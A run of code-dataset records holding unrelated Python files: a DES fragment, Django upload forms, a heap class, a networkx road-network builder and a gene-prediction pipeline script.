range(0,43,6):\n t = mright[i:i+6]\n r = str(t[0]) + str(t[5])\n c = t[1:5]\n x = s_boxes[count][int(r, 2)][int(c)]\n sv.append(BitVector(intVal=x, size=4))\n count += 1\n rsv = sv[0]\n for i in range(1, len(sv)):\n rsv = rsv + sv[i]\n rsv = rsv.permute(perm)\n return rsv\n\n\ndef main():\n key = read_key()\n getEncryptionKeys(key)\n enc_message()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","sub_path":"NS/hw2/DES/des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"185452548","text":"from django.forms import ModelForm, ValidationError, CheckboxSelectMultiple\nfrom django.contrib import messages\nfrom django.forms.models import modelformset_factory\nfrom django.urls import reverse_lazy\nfrom functools import reduce\nimport magic \n\nfrom .models import Tag, Asset\n\n# ----------------------------------------------------------------------\n# FORMS \n# ----------------------------------------------------------------------\nclass Tag_Create_Form(ModelForm):\n\n class Meta:\n model = Tag\n fields = ['name'] \n\n def form_valid(self, form):\n messages.success(self.request, 'Tag aggiunto.')\n return super(Tag_Create_Form, self).form_valid(form)\n\nclass Asset_Select_Form(ModelForm):\n\n class Meta:\n model: Asset\n fields = ['isSelected']\n\nclass Asset_Upload_Form(ModelForm):\n\n class Meta:\n model = Asset\n fields = ['typeOf', 'resource', 'tag']\n widgets = {\n 'tag' : CheckboxSelectMultiple()\n }\n\n def clean(self):\n # get data\n data = self.cleaned_data\n # # get field values\n # resource = data['resource']\n # typeOf = data['typeOf']\n # # --------------------------------------------\n # # mime type check\n # # --------------------------------------------\n # mime = magic.from_buffer(resource.read(), mime=True)\n # if reduce(lambda acc, itr: mime.find(itr.lower()) + acc, Asset.ASSETS_MIMETYPES, 0) == len(Asset.ASSETS_MIMETYPES) * -1:\n # self.add_error('resource', ValidationError('Tipo di file non riconosciuto.', code=\"invalid type\"))\n # # --------------------------------------------\n # # file size check\n # # --------------------------------------------\n # if resource.size > Asset.ASSET_FILES_LIMITS[typeOf]:\n # self.add_error('resource', ValidationError('File di dimensioni eccessive.', code=\"invalid size\"))\n # return data\n return data\n\nclass Asset_Update_Form(Asset_Upload_Form): \n \n # set required to false in update form\n def __init__(self, *args, **kwargs):\n super(Asset_Update_Form, self).__init__(*args, **kwargs)\n self.fields['resource'].required = False \n\n# ----------------------------------------------------------------------\n# FORMSETS\n# ----------------------------------------------------------------------\nTag_Formset_Factory = modelformset_factory(\n Tag,\n Tag_Create_Form,\n extra=1,\n can_delete=True\n)\n\nAsset_Formset_Factory = modelformset_factory(\n Asset,\n Asset_Select_Form,\n extra=0,\n can_delete=True\n)","sub_path":"apps/filer/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123379002","text":"import random\n\nclass HeapEmptyException(Exception):\n pass\n\nclass Heap(object):\n '''A class representing a heap'''\n \n def __init__(self, insert_list= []):\n '''(Heap [,list]) -> NoneType\n Create a new Heap containing the elements in insert_list\n '''\n self._heap = []\n for element in insert_list:\n self.insert(element)\n \n def is_empty(self):\n '''(Heap) -> bool\n Return True iff there are no nodes in this Heap\n '''\n return self._heap == []\n \n def insert(self, insert_value):\n '''(Heap, object) -> NoneType\n Insert insert_value into the heap\n REQ: insert_value is not already in the heap\n '''\n self._heap.append(insert_value)\n self._bubble_up()\n \n \n def _bubble_up(self):\n '''(Heap) -> NoneType\n Re-arrange the values in the heap to maintain the heap property after\n a new element has been inserted into the heap\n '''\n c_index = len(self._heap) -1\n p_index = (c_index -1) // 2\n #Keep looping as long as we're still violating the heap condition\n while(c_index > 0 and self._heap[c_index] > self._heap[p_index]):\n #swap the parent and child\n self._swap(c_index, p_index)\n #check the next level up\n c_index = p_index\n p_index = (p_index -1) // 2\n\n def _swap(self, i, j):\n '''(Heap, int, int) -> NoneType\n Swap the values at index i and j\n '''\n (self._heap[i], self._heap[j]) = (self._heap[j], self._heap[i])\n \n def __str__(self):\n '''(Heap) -> str\n Return a string representation of this Heap\n '''\n return str(self._heap) + \"\\n\" + self._str_helper(0, \"\")\n \n def _str_helper(self, node_index, indentation):\n '''(Heap, int, str) -> str\n Return a string representation of the node at node_index, indented\n with indentation\n '''\n \n #base case: this node doens't exist\n if(node_index >= len(self._heap)):\n return \"\"\n else:\n #RD: print left, then self, then right\n lc_index = (node_index * 2) + 1\n rc_index = (node_index * 2) + 2 \n ret = self._str_helper(rc_index, indentation + \"\\t\")\n ret += indentation + str(self._heap[node_index]) + \"\\n\"\n ret += self._str_helper(lc_index, indentation + \"\\t\")\n return ret\n \n def remove_top(self):\n '''(Heap) -> object\n Remove and return the largest element in the heap\n RAISES: HeapEmptyException if heap is empty\n '''\n if(len(self._heap) == 0):\n raise HeapEmptyException(\"Attempt to remove top of empty heap\")\n else:\n #save the top element\n ret = self._heap[0]\n #remove the last element from the heap, and \n #replace the head's value with it\n last = self._heap.pop()\n if(len(self._heap) > 0):\n self._heap[0] = last\n self._bubble_down()\n return ret\n \n def _bubble_down(self):\n '''(Heap) -> NoneType\n Re-arrange the values in the heap to maintain the heap property after\n the top element of the heap has been removed\n '''\n p_index = 0\n lt_index = (p_index * 2) + 1\n rt_index = (p_index * 2) + 2\n #keep looping while we violate the heap property\n while(self._violates(p_index)):\n #one of our children violates the heap property\n #if we only have a left child, it must be that one\n if(rt_index >= len(self._heap)):\n self._swap(p_index, lt_index)\n p_index = lt_index\n \n #if we have two children, we need to swap with the larger child\n elif(self._heap[lt_index] > self._heap[rt_index]):\n self._swap(p_index, lt_index)\n p_index = lt_index\n else:\n self._swap(p_index, rt_index)\n p_index = rt_index\n #find the new children for the next loop\n lt_index = (p_index * 2) + 1\n rt_index = (p_index * 2) + 2\n \n \n \n \n def _violates(self, index):\n '''(Heap, int) -> bool\n Return True iff the node at index and one of its children violate the\n heap property\n '''\n lt_index = (index * 2) + 1\n rt_index = (index * 2) + 2\n #if we have no children, we're fine\n if(lt_index >= len(self._heap)):\n return False\n #if we have one child, return True iff it violates\n elif(rt_index >= len(self._heap)):\n return self._heap[lt_index] > self._heap[index]\n #if we have two children, return True if either child violates\n else:\n return (self._heap[lt_index] > self._heap[index]\n or self._heap[rt_index] > self._heap[index])\n\nif(__name__ == \"__main__\"):\n \n my_unordered_list = [3,6,1,5,2,10,15]\n heap_test = Heap(my_unordered_list)\n print(heap_test)\n heap_test.remove_top()\n print(heap_test)\n \n \n '''\n my_unordered_list = []\n for i in range(100):\n my_unordered_list.append(random.random() * 100)\n my_heap = Heap(my_unordered_list)\n #print(my_heap)\n my_ordered_list = []\n #my_heap.remove_top()\n #print(\"---\")\n #print(my_heap)\n while(not my_heap.is_empty()):\n my_ordered_list.append(my_heap.remove_top())\n print(my_heap)\n print(my_unordered_list)\n '''\n \n","sub_path":"Review/Heap/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"155010385","text":"\"\"\"\nThis class implements the top-level functions that maintain road networks in memory. The road network should be\nrepresented in three different ways called Views:\n\n1. tileView: A tile -> set of blue_edge_id mapping. The tile is a 1km x 1km region that is represented by the latitude, longitude of\nits center. In python, we store this as a dictionary of lists. {(latitude, longitude): [edge_id_1, edge_id_2...], ...}\n2. SegmentView: A networkx Graph object where the nodes are the blue nodes (points along a road) and the edges are the blue edges.\nA blue edge is a fundamental unit of the road that is assumed to be a straight line segment.\n3. SettlementView: A networkx Graph object where the nodes are settlements and edges are roads that connect these settlements.\nThe \"red\" edges each have two sets as attributes: The set of blue nodes along the inter-settlement road, and the set of\nblue edges that form up that road.\n\"\"\"\nimport csv\nimport math\nfrom itertools import combinations\nfrom copy import deepcopy\n\nimport networkx as nx\nfrom networkx import NetworkXNoPath\nimport pandas as pd\nfrom poseidon.infrastructure.geo_location import GeoLocation\n\n\nclass RoadNetwork:\n DATA_DIR = \"dat\"\n CITY_PERIMETER = 2 # 2 km bounding box distance for cities\n graph_segment_view = None\n graph_settlement_view = None\n graph_tile_view = None\n\n def __init__(self, recreate_files=False):\n if recreate_files:\n self.construct_segment_view()\n self.construct_settlement_view_from_parts()\n self.construct_tile_view()\n self.graph_segment_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n self.graph_settlement_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n try:\n self.graph_tile_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_tile_view.gpickle\")\n except FileNotFoundError:\n print(\"Couldn't find tile view file. If your segment view file exists, I will create the tile view now\")\n self.construct_tile_view()\n\n self.make_helper_maps()\n\n # creates a couple of precomputed helper maps to speed up computation\n # A map from blue nodes to a list of red edges it supports\n\n def make_helper_maps(self):\n self.initial_shortest_path_lengths = {}\n\n for red_edge_u, red_edge_v, attr in self.graph_settlement_view.edges(data=True):\n blue_u = attr['blue_nodes'][1]\n blue_v = attr['blue_nodes'][-2]\n if len(attr['blue_nodes']) == 2:\n self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)] = 0\n continue\n try:\n self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)] = nx.shortest_path_length(\n self.graph_segment_view, blue_u, blue_v)\n except NetworkXNoPath:\n self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)] = len(self.graph_segment_view)\n\n\n # constructs the segment_view and saved it into graph_segment_view.gpickle\n def construct_segment_view(self):\n print(\"Building segment view...\")\n graph_segment_view = nx.Graph()\n with open(f\"{self.DATA_DIR}/cal.cnode.csv\") as f:\n for row in csv.reader(f):\n lat = float(row[2])\n lng = float(row[1])\n node_id = row[0]\n graph_segment_view.add_node(\n node_id,\n pos=GeoLocation.from_degrees(lat, lng),\n mappedToCity=False\n )\n\n with open(f\"{self.DATA_DIR}/cal.cedge.csv\") as f:\n for row in csv.reader(f):\n graph_segment_view.add_edge(row[1], row[2], d=row[3])\n\n nx.write_gpickle(graph_segment_view, f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n self.graph_segment_view = graph_segment_view\n print(\"Done\")\n print(graph_segment_view.number_of_nodes(), \"blue segments.\")\n print(graph_segment_view.number_of_edges(), \"blue edges.\")\n\n # constructs 'representative_nodes' for each city (red node)\n # then combines all blue nodes within the cities perimeter into the representative node.\n # cities with bigger population will get the veto in case more than one city claims the blue node.\n def get_combined_nodes_within_city_perimeter(self, read_from_file=False):\n if read_from_file:\n return nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view_nodes_combined.gpickle\")\n\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n\n # sort by population -> larger cities will get to pick the blue nodes first.\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n graph_segment_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n graph_segment_view_nodes_combined = graph_segment_view.copy()\n\n # let's start\n print(\"Merging blue nodes...\")\n print(f\"Started with {graph_segment_view_nodes_combined.number_of_nodes()} blue segments.\")\n counter, num_cities = 0, len(settlement_df) # just so we can keep tabs in the console\n for index, city in settlement_df.iterrows():\n counter += 1\n print(f\"\\r{counter}/{num_cities} :: {city['city']} \", end=\"\")\n\n city_location = GeoLocation.from_degrees(float(city['lat']), float(city['lng']))\n sw_bound, ne_bound = city_location.bounding_locations(self.CITY_PERIMETER)\n\n # first we'll add a blue node that will represent the entire city\n graph_segment_view_nodes_combined.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n mappedToCity=True\n )\n representative_node = city['id']\n\n # now we will combine all blue nodes that fall within the city perimeters\n for node_id, blue_node in graph_segment_view_nodes_combined.nodes(data=True):\n try:\n if blue_node['mappedToCity']:\n continue\n except KeyError:\n pass\n # try:\n if blue_node['pos'].within_bounds(sw_bound, ne_bound):\n graph_segment_view_nodes_combined = nx.contracted_nodes(\n graph_segment_view_nodes_combined,\n representative_node,\n str(node_id),\n self_loops=False\n )\n\n # when we merge nodes, it stores all the properties of the previous node too.\n # this can get very long. and we don't need it anyway. therefore we clear this field.\n graph_segment_view_nodes_combined.nodes[representative_node]['contraction'] = {}\n # except:\n # print(blue_node)\n\n # we're done! let's finally write the graph into a file\n nx.write_gpickle(\n graph_segment_view_nodes_combined, f\"{self.DATA_DIR}/graph_segment_view_nodes_combined.gpickle\"\n )\n\n print(f\"\\nAfter merging we have {graph_segment_view_nodes_combined.number_of_nodes()} blue segments.\")\n\n return graph_segment_view_nodes_combined\n\n # combines blue node 1 to blue node 2, if 1 has less than 2 out-degree\n # we're just simplifying the paths so building settlement doesn't take 60 hours.\n def get_two_neighbor_combined_nodes(self, read_from_file=False):\n if read_from_file:\n return nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_two_neighbor_combined_nodes.gpickle\")\n\n graph_segment_two_neighbor_combined_nodes = self.get_combined_nodes_within_city_perimeter(True)\n\n print(f\"Started with {graph_segment_two_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n counter, num_nodes = 0, graph_segment_two_neighbor_combined_nodes.number_of_nodes()\n for node_id, blue_node in graph_segment_two_neighbor_combined_nodes.nodes(data=True):\n counter += 1\n print(f\"\\r{counter} / {num_nodes}\", end=\"\")\n try:\n if blue_node['mappedToCity']:\n continue\n except KeyError:\n pass\n degree = graph_segment_two_neighbor_combined_nodes.degree(node_id)\n if degree == 0:\n graph_segment_two_neighbor_combined_nodes.remove_node(node_id)\n elif degree <= 2:\n neighbor_node = next(graph_segment_two_neighbor_combined_nodes.neighbors(node_id))\n graph_segment_two_neighbor_combined_nodes = nx.contracted_nodes(\n graph_segment_two_neighbor_combined_nodes,\n neighbor_node,\n str(node_id),\n self_loops=False\n )\n\n graph_segment_two_neighbor_combined_nodes.nodes[neighbor_node]['contraction'] = {}\n\n print(f\"\\nAfter merging we have {graph_segment_two_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n # we're done! let's finally write the graph into a file\n nx.write_gpickle(\n graph_segment_two_neighbor_combined_nodes, f\"{self.DATA_DIR}/graph_segment_two_neighbor_combined_nodes.gpickle\"\n )\n return graph_segment_two_neighbor_combined_nodes\n\n # Does the same thing as get_two_neighbor_combined_nodes once more.\n # this only reduces the number of nodes by ~5%. So, we stop here.\n def get_four_neighbor_combined_nodes(self, read_from_file=False):\n if read_from_file:\n return nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_four_neighbor_combined_nodes.gpickle\")\n\n graph_segment_four_neighbor_combined_nodes = self.get_two_neighbor_combined_nodes(True)\n\n print(f\"Started with {graph_segment_four_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n counter, num_nodes = 0, graph_segment_four_neighbor_combined_nodes.number_of_nodes()\n for node_id, blue_node in graph_segment_four_neighbor_combined_nodes.nodes(data=True):\n counter += 1\n print(f\"\\r{counter} / {num_nodes}\", end=\"\")\n try:\n if blue_node['mappedToCity']:\n continue\n except KeyError:\n pass\n degree = graph_segment_four_neighbor_combined_nodes.degree(node_id)\n if degree == 0:\n graph_segment_four_neighbor_combined_nodes.remove_node(node_id)\n elif degree <= 2:\n neighbor_node = next(graph_segment_four_neighbor_combined_nodes.neighbors(node_id))\n graph_segment_four_neighbor_combined_nodes = nx.contracted_nodes(\n graph_segment_four_neighbor_combined_nodes,\n neighbor_node,\n str(node_id),\n self_loops=False\n )\n\n graph_segment_four_neighbor_combined_nodes.nodes[neighbor_node]['contraction'] = {}\n\n print(f\"\\nAfter merging we have {graph_segment_four_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n # we're done! let's finally write the graph into a file\n nx.write_gpickle(\n graph_segment_four_neighbor_combined_nodes,\n f\"{self.DATA_DIR}/graph_segment_four_neighbor_combined_nodes.gpickle\"\n )\n return graph_segment_four_neighbor_combined_nodes\n\n # this method is redundant, and got replaced by construct_settlement_view_using_combined_nodes\n def construct_settlement_view_using_shortest_path(self):\n print(\"Building settlement view...\")\n graph_settlement_view = nx.Graph()\n\n # first we'll read all the cities -- our RED nodes, and store them as nodes into the settlement_view\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n for index, city in settlement_df.iterrows():\n graph_settlement_view.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n name=city['city'],\n population=city['population']\n )\n print(f\"Read {graph_settlement_view.number_of_nodes()} red nodes.\")\n\n # now, we'll combine all blue nodes within city perimeters into a single node\n graph_segment_view_nodes_combined = self.get_combined_nodes_within_city_perimeter(True)\n print(f\"Read {graph_segment_view_nodes_combined.number_of_nodes()} merged blue nodes.\")\n\n # for every red node u,\n # for every red node v:\n # remove all red nodes other than u and v\n # find shortest blue path between u and v\n # add red edge between u and v\n all_red_nodes = list(graph_settlement_view.nodes())\n\n import time\n start = time.time()\n print(f\"Start: {start}\")\n\n red_node_degrees = dict()\n red_nodes_with_edges = list()\n for red_node in all_red_nodes:\n red_node_degrees[red_node] = graph_segment_view_nodes_combined.degree(red_node)\n if red_node_degrees[red_node]:\n red_nodes_with_edges.append(red_node)\n\n # for u, v in combinations(all_red_nodes, 2):\n for i, u in enumerate(red_nodes_with_edges):\n for j, v in enumerate(red_nodes_with_edges[i+1:]):\n print(f\"\\r{i}x{j} / {len(red_nodes_with_edges)}\", end=\"\")\n graph_segment_view_other_nodes_removed = graph_segment_view_nodes_combined.copy()\n for red_node in red_nodes_with_edges:\n if red_node not in [u, v]:\n graph_segment_view_other_nodes_removed.remove_node(red_node)\n if nx.has_path(graph_segment_view_other_nodes_removed, u, v):\n path = nx.shortest_path(graph_segment_view_other_nodes_removed, u, v)\n graph_settlement_view.add_edge(u, v, blue_nodes=path)\n print(f\"\\tDuration: {time.time() - start}\", end=\"\")\n\n nx.write_gpickle(graph_settlement_view, f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n self.graph_settlement_view = graph_settlement_view\n\n # uses the four_neighbor_combined_nodes to construct the settlemet view using shortest path algorithm\n # even this takes ~ 3 hours.\n # therefore I split it into 5 google colabs and ran it to produce parts\n # the ratio of nodes for parts were - 0-113, 113-242, 242-395, 395-595, 595-1073\n def construct_settlement_view_using_combined_nodes(self):\n print(\"Building settlement view...\")\n graph_settlement_view = nx.Graph()\n\n # first we'll read all the cities -- our RED nodes, and store them as nodes into the settlement_view\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n for index, city in settlement_df.iterrows():\n graph_settlement_view.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n name=city['city'],\n population=city['population']\n )\n print(f\"Read {graph_settlement_view.number_of_nodes()} red nodes.\")\n\n # now, we'll combine all blue nodes within city perimeters into a single node\n graph_segment_view_nodes_combined = self.get_combined_nodes_within_city_perimeter(True)\n print(f\"Read {graph_segment_view_nodes_combined.number_of_nodes()} merged blue nodes.\")\n\n # we'll also combine all blue nodes which have just two neighbors\n graph_segment_two_neighbor_combined_nodes = self.get_two_neighbor_combined_nodes(True)\n print(f\"Read {graph_segment_two_neighbor_combined_nodes.number_of_nodes()} merged blue nodes.\")\n\n # we'll do the same again\n graph_segment_four_neighbor_combined_nodes = self.get_four_neighbor_combined_nodes(True)\n print(f\"Read {graph_segment_four_neighbor_combined_nodes.number_of_nodes()} merged blue nodes.\")\n\n # for every red node u,\n # for every red node v:\n # remove all red nodes other than u and v\n # find shortest blue path between u and v\n # add red edge between u and v\n all_red_nodes = list(graph_settlement_view.nodes())\n\n import time\n start = time.time()\n print(f\"Start: {start}\")\n\n red_node_degrees = dict()\n red_nodes_with_edges = list()\n for red_node in all_red_nodes:\n red_node_degrees[red_node] = graph_segment_four_neighbor_combined_nodes.degree(red_node)\n if red_node_degrees[red_node]:\n red_nodes_with_edges.append(red_node)\n\n # for u, v in combinations(all_red_nodes, 2):\n for i, u in enumerate(red_nodes_with_edges):\n for j, v in enumerate(red_nodes_with_edges[i + 1:]):\n print(f\"\\r{i}x{j} / {len(red_nodes_with_edges)}\", end=\"\")\n graph_segment_view_other_nodes_removed = graph_segment_four_neighbor_combined_nodes.copy()\n for red_node in red_nodes_with_edges:\n if red_node not in [u, v]:\n graph_segment_view_other_nodes_removed.remove_node(red_node)\n if nx.has_path(graph_segment_view_other_nodes_removed, u, v):\n path = nx.shortest_path(graph_segment_view_other_nodes_removed, u, v)\n graph_settlement_view.add_edge(u, v, blue_nodes=path)\n print(f\"\\tDuration: {time.time() - start}\", end=\"\")\n\n nx.write_gpickle(graph_settlement_view, f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n self.graph_settlement_view = graph_settlement_view\n\n # finally, we can combine the parts into a single settlement view.\n def construct_settlement_view_from_parts(self):\n print(\"Building settlement view from parts...\")\n graph_settlement_view = nx.Graph()\n\n # first we'll read all the cities -- our RED nodes, and store them as nodes into the settlement_view\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n for index, city in settlement_df.iterrows():\n graph_settlement_view.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n name=city['city'],\n population=city['population']\n )\n print(f\"Read {graph_settlement_view.number_of_nodes()} red nodes.\")\n\n # now let's read the parts\n parts = [\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_0.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_1.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_2.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_3.gpickle\"),\n nx.read_gpickle(f\"{self.DATA_DIR}/settlement_parts/graph_settlement_view_4.gpickle\")\n ]\n\n for part in parts:\n for u, v, a in part.edges(data=True):\n # print(u, v, a)\n # import sys; sys.exit();\n graph_settlement_view.add_edge(u, v, blue_nodes=a['blue_nodes'])\n print(f\"{graph_settlement_view.number_of_nodes()} nodes and \"\n f\"{graph_settlement_view.number_of_edges()} edges.\")\n\n nx.write_gpickle(graph_settlement_view, f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n self.graph_settlement_view = graph_settlement_view\n\n def construct_tile_view(self):\n print(\"Building tile view...\")\n graph_segment_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n graph_tile_view = nx.Graph()\n\n min_lat = 400\n max_lat = -400\n min_lng = 400\n max_lng = -400\n with open(f\"{self.DATA_DIR}/cal.cnode.csv\") as f:\n for row in csv.reader(f):\n lat = float(row[2])\n lng = float(row[1])\n min_lat = min(lat, min_lat)\n max_lat = max(lat, max_lat)\n min_lng = min(lng, min_lng)\n max_lng = max(lng, max_lng)\n print(f\"min_lat: {min_lat} \\tmax_lat: {max_lat} \\tmin_lng: {min_lng} \\tmax_lng: {max_lng} \\t\")\n\n delta = 0.01\n\n # just some small utility functions\n def get_tile_id(_lat, _lng):\n return (\n math.floor((_lat - min_lat) / delta),\n math.floor((_lng - min_lng) / delta)\n )\n\n max_tile_i, max_tile_j = get_tile_id(max_lat, max_lng)\n for i in range(max_tile_i + 1):\n for j in range(max_tile_j + 1):\n sw_loc = GeoLocation.from_degrees(min_lat + i * delta, min_lng + j * delta)\n ne_loc = GeoLocation.from_degrees(min_lat + (i + 1) * delta, min_lng + (j + 1) * delta)\n center_loc = GeoLocation.from_degrees(min_lat + i * delta/2, min_lng + j * delta/2)\n graph_tile_view.add_node(\n (i, j), sw_loc=sw_loc, ne_loc=ne_loc, center_loc=center_loc, segment_nodes=set(), segment_edges=set()\n )\n\n # now we assign blue nodes to tiles they belong to\n blue_nodes = graph_segment_view.nodes(data=True)\n for node, attr in blue_nodes:\n location = attr['pos']\n tile_id = get_tile_id(location.deg_lat, location.deg_lon)\n graph_tile_view.nodes[tile_id]['segment_nodes'].append(node)\n\n # now we assign blue edges to tiles\n # we should ideally take all the tiles along the line joining u to v, then add a segment edge to all those\n # tiles. But no big deal\n for u, v in graph_segment_view.edges():\n location = blue_nodes[u]['pos']\n tile1 = get_tile_id(location.deg_lat, location.deg_lon)\n\n location = blue_nodes[v]['pos']\n tile2 = get_tile_id(location.deg_lat, location.deg_lon)\n\n graph_tile_view.nodes[tile1]['segment_edges'].append((u, v))\n\n if tile1 != tile2:\n graph_tile_view.nodes[tile2]['segment_edges'].append((u, v))\n\n # we need to delete those tiles that don't contain any roads at all. Would greatly speed up computation\n\n node_indices = []\n segment_lengths = []\n for node, attr in graph_tile_view.nodes(data=True):\n node_indices.append(node)\n segment_lengths.append(len(attr['segment_nodes']))\n for node, length in zip(node_indices, segment_lengths):\n if length == 0:\n graph_tile_view.remove_node(node)\n\n nx.write_gpickle(graph_tile_view, f\"{self.DATA_DIR}/graph_tile_view.gpickle\")\n self.graph_tile_view = graph_tile_view\n print(f\"Done! Created {graph_tile_view.number_of_nodes()} tiles.\")\n\n # if a blue node is gone, then the corresponding red edge must disappear\n def get_recalculated_settlement_view_from_segment_view(self, new_segment_view, city_damaged):\n new_settlement_view = self.graph_settlement_view.copy()\n\n city_damaged_map = {node : city_damaged[i] for i, node in enumerate(self.graph_settlement_view.nodes())}\n removed_edges = set()\n\n for red_edge_u, red_edge_v, attr in self.graph_settlement_view.edges(data=True):\n blue_u = attr['blue_nodes'][1]\n blue_v = attr['blue_nodes'][-2]\n if len(attr['blue_nodes']) == 2:\n if city_damaged_map[red_edge_u] or city_damaged_map[red_edge_v]:\n # direct city-city link. If one of the cities is damaged, then that link is broken\n removed_edges.add((red_edge_u, red_edge_v))\n continue\n if not (blue_u in new_segment_view and blue_v in new_segment_view):\n removed_edges.add((red_edge_u, red_edge_v))\n continue\n try:\n if nx.shortest_path_length(new_segment_view, blue_u, blue_v) > self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)]:\n removed_edges.add((red_edge_u, red_edge_v))\n except NetworkXNoPath:\n removed_edges.add((red_edge_u, red_edge_v))\n new_settlement_view.remove_edges_from(removed_edges)\n return new_settlement_view\n\n # This function takes a given set of tiles (damaged) and deletes the corresponding edges from the segmentView.\n # Useful for applying damages.\n def get_recalculated_segment_view(self, damaged_road_tiles):\n removed_blue_nodes = set()\n for tile in damaged_road_tiles:\n removed_blue_nodes = removed_blue_nodes.union(self.graph_tile_view.nodes[tile]['segment_nodes'])\n new_segment_view = self.graph_segment_view.copy()\n\n new_segment_view.remove_nodes_from(removed_blue_nodes)\n return new_segment_view\n\n\nif __name__ == '__main__':\n RoadNetwork(recreate_files=False)\n","sub_path":"webapp/poseidon/infrastructure/road_network_revised.py","file_name":"road_network_revised.py","file_ext":"py","file_size_in_byte":25349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"354827715","text":"#!/usr/bin/env python3\n\n\nimport sys\nimport os \nimport subprocess\nimport argparse\n\ndef genemark(i):\n\t\n\tif os.path.exists(\"./gms2results\") != True:\n\t\tsubprocess.call([\"mkdir\", \"gms2results\"])\n\tif os.path.exists(\"./gms2results/gfffiles\") != True:\n\t\tsubprocess.call([\"mkdir\",\"gms2results/gfffiles\"])\n\tif os.path.exists(\"./gms2results/nucleotidefasta\") != True:\n\t\tsubprocess.call([\"mkdir\",\"gms2results/nucleotidefasta\"])\n\tif os.path.exists(\"./gms2results/proteinfasta\") != True:\n\t\tsubprocess.call([\"mkdir\",\"gms2results/proteinfasta\"])\n\t\n\tgff = os.path.join(\"gms2results/gfffiles\",\"{}.gff\".format(i.split(\".\")[0]))\n\tnucleotides = os.path.join(\"gms2results/nucleotidefasta\",\"{}.fna\".format(i.split(\".\")[0]))\n\tproteins = os.path.join(\"gms2results/proteinfasta\",\"{}.faa\".format(i.split(\".\")[0]))\n\tdir = i\n\tsubprocess.call([\"./gms2_linux_64/gms2.pl\", \"--seq\", dir, \"--genome-type\", \"bacteria\", \"--output\",gff,\"--format\",\"gff\",\"--fnn\",nucleotides,\"--faa\",proteins])\n\t\ndef prodigal(i):\n\tif os.path.exists(\"./prodigalresults\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults\"])\n\tif os.path.exists(\"./prodigalresults/nucleotide\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults/nucleotide\"])\n\tif os.path.exists(\"./prodigalresults/protein\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults/protein\"])\n\tif os.path.exists(\"./prodigalresults/gff\") != True:\n\t\tsubprocess.call([\"mkdir\",\"prodigalresults/gff\"])\n\t\t\n\tprotein = os.path.join(\"prodigalresults/protein\",\"{}.faa\".format(i.split(\".\")[0]))\n\tnucleotide = os.path.join(\"prodigalresults/nucleotide\",\"{}.fna\".format(i.split(\".\")[0]))\n\tgff = os.path.join(\"prodigalresults/gff\",\"{}.gff\".format(i.split(\".\")[0]))\n\tdir = i\n\tsubprocess.call([\"./Prodigal/prodigal\",\"-i\",dir,\"-a\",protein,\"-d\",nucleotide,\"-o\",gff,\"-f\",\"gff\"])\n\ndef bedtools_func(i, home):\n\tif os.path.exists(\"./prodigal-genemark\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark'])\n\tif os.path.exists(\"./prodigal-genemark/gfffiles\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/gfffiles'])\n\tif os.path.exists(\"./prodigal-genemark/gfffilesunion\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/gfffilesunion'])\n\tif os.path.exists(\"./prodigal-genemark/nucleotides\") != 